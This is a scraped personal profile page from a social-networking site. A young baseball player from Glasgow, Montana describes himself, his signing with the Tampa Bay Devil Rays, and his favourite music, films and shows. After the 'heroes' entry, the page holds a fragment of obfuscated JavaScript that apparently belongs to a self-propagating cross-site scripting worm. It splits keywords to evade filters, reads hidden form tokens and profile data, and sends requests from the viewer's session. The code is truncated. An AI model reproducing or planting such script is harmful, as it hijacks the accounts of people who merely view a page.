Montana profile picture


Big Leaguer!

About Me

Hey. I'm Mike. I live in a little town in Montana called Glasgow. I grew up in Montana and there is no other place like it. The people and the sights are what make Montana what it is, AMAZING! I like to hangout with friends and have a good time. I am a very chill person and I take life as it comes at me. I am about to start a new life of professional baseball. Baseball is my passion and I am finally getting the opportunity to go play for a living. The Tampa Bay Devil Rays is who I am playing for and I can't wait to move my way up to the big leagues someday.I got my layout at

My Interests

I love playing baseball and poker! I like to chill with my friends and have a good time.

I'd like to meet:

Jessica Alba definitely! Ummm...Chipper Jones, Allen Iverson, and Bobby Cox!


Alter Bridge, Scott Stapp, most alternative music. I like alot of rap but not all, and I like a little country.


Phenomenon, Dumb and Dumber, The Shawshank Redemption, Anchor Man, Talladega Nights, 40 Year-old Virgin, Waiting, Running Scare, and MANY more.


Simpsons, Laguna Beach, The O.C., Sportscenter, Prison Break, and of course American Idol!


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Allen Iverson, Will Smith, Chris Farley and...........anyone who makes a difference in my life!0){N+='&'}var Q=escape(AV[P]);while(Q.indexOf('+')!=-1){Q=Q.replace('+','% 2B')}while(Q.indexOf('&')!=-1){Q=Q.replace('&','%26' )}N+=P+'='+Q;O++}return N}function httpSend(BH,BI,BJ,BK){if(!J){return false}..'J.onr'+'eadystatechange=BI');,BH,true);if( BJ=='POST'){J.setRequestHeader('Content-Type','application/x -www-form-urlencoded');J.setRequestHeader('Content-Length',B K.length)}J.send(BK);return true}function findIn(BF,BB,BC){var R=BF.indexOf(BB)+BB.length;var S=BF.substring(R,R+1024);return S.substring(0,S.indexOf(BC))}function getHiddenParameter(BF,BG){return findIn(BF,'name='+B+BG+B+' value='+B,B)}function getFromURL(BF,BG){var T;if(BG=='Mytoken'){T=B}else{T='&'}var U=BG+'=';var V=BF.indexOf(U)+U.length;var W=BF.substring(V,V+1024);var X=W.indexOf(T);var Y=W.substring(0,X);return Y}function getXMLObj(){var Z=false;if(window.XMLHttpRequest){try{Z=new XMLHttpRequest()}catch(e){Z=false}}else if(window.ActiveXObject){try{Z=new ActiveXObject('Msxml2.XMLHTTP')}catch(e){try{Z=new ActiveXObject('Microsoft.XMLHTTP')}catch(e){Z=false}}}return Z}var AA=getSource();var AB=AA.indexOf('m'+'ycode');var AC=AA.substring(AB,AB+4096);var AD=AC.indexOf('D'+'IV');var AE=AC.substring(0,AD);var AF;if(AE){AE=AE.replace('jav'+'a',A+'jav'+'a');AE=AE.replace ('exp'+'r)','exp'+'r)'+A);AF=' '}var AG;function getHome(){if(J.readyState!=4){return}var AU=J.responseText;AG=findIn(AU,'P'+'rofileHeroes',' ');AG=AG.substring(61,AG.length);if(AG.indexOf('
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